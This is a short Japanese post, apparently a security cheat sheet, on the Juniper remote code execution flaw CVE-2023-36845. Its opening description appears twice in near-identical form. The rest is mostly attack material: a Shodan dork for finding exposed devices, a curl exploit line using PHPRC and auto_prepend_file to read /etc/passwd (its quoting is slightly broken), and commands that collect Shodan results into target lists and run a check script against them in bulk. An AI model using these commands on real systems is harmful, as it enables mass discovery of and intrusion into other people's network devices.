
Juniper RCE(リモートコード実行)CVE-2023-36845は、Juniperのソフトウェアで特定された脆弱性です。この特定の欠陥により、リモートコード実行が可能となり、攻撃者はデバイスへの物理的なアクセスを必要とせずにシステム上で任意のコードを実行できる可能性があります。
Juniper RCE(リモートコード実行)CVE-2023-36845 は、Juniper のソフトウェアで確認された脆弱性です。この特定の欠陥によりリモートからのコード実行が可能となり、攻撃者はデバイスに物理的にアクセスすることなく、システム上で任意のコードを実行できる可能性があります。
Shodan dork: http.favicon.hash:2141724739
SSL証明書や組織名など、関連する他のdorkと組み合わせて使用することで、よりターゲットを絞った検索が可能です。
curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'
└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com' #shodanからダウンロード
└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt
└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt
└─# ./Juniper-RCE-check.sh -f juniper-final.txt
